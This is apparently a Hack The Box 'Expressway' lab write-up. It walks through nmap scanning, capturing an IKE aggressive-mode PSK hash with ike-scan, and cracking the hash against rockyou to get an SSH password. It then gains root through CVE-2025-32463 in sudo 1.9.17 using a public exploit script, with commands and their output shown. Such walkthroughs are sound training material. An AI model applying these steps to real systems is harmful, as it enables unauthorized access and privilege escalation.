HTB Expressway
Contents
Enum
First doing port scanning.
❯ nmap -sCV -T4 10.10.11.87
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-07 18:58 +0700
Nmap scan report for expressway.htb (10.10.11.87)
Host is up (0.061s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelSeems only port 22 SSH open, i tried to rescan using UDP method.
sudo nmap -sU -p- --top-ports 200 10.10.11.87
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-07 18:59 +0700=
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ikeLooks that port 500 isakmp are open.
Foothold
Using ike-scan.
❯ sudo ike-scan -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=37311a644b96bf83)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.084 seconds (11.94 hosts/sec). 1 returned handshake; 0 returned notifyTry to using aggresive mode.
❯ sudo ike-scan -M -A 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=7758f632446e0796)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.110 seconds (9.07 hosts/sec). 1 returned handshake; 0 returned notifyLooks that any id user named ike@expressway.htb.
Try to extract using pskcrack.
sudo ike-scan -M -A 10.10.11.87 --pskcrack=output.txtNow brute the hash using hashcat, pskcrack or john, and the wordlists is rockyou.txt.
psk-crack -d /usr/share/dict/rockyou.txt output.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash c1dd8393403ec99db7270e5d49def7c1659dace9
Ending psk-crack: 8045039 iterations in 46.258 seconds (173915.12 iterations/sec)Now we have SSH credentials, username ike@expressway.htb and the password is freakingrockstarontheroad. Try to access it.
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
ike@expressway:~$Privilege Escalation
Try to run command sudo -l.
ike@expressway:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
For security reasons, the password you type will not be visible.
Password:
Sorry, try again.Seems like custom sudo. If we look at sudo location.
ike@expressway:~$ which sudo
/usr/local/bin/sudo
ike@expressway:~$This not default sudo location.
ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17Try to find public exploits.
CVE-2025-32463.
Using this exploit. https://github.com/kh4sh3i/CVE-2025-32463
Copy into the machine using SCP.
scp exploit.sh ike@expressway.htb:/tmp
ike@expressway.htb's password:
exploit.sh Open the machine, run id command first to check user now.
ike@expressway:/tmp$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:/tmp$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)Pwned.
root@expressway:/# cat /root/root.txt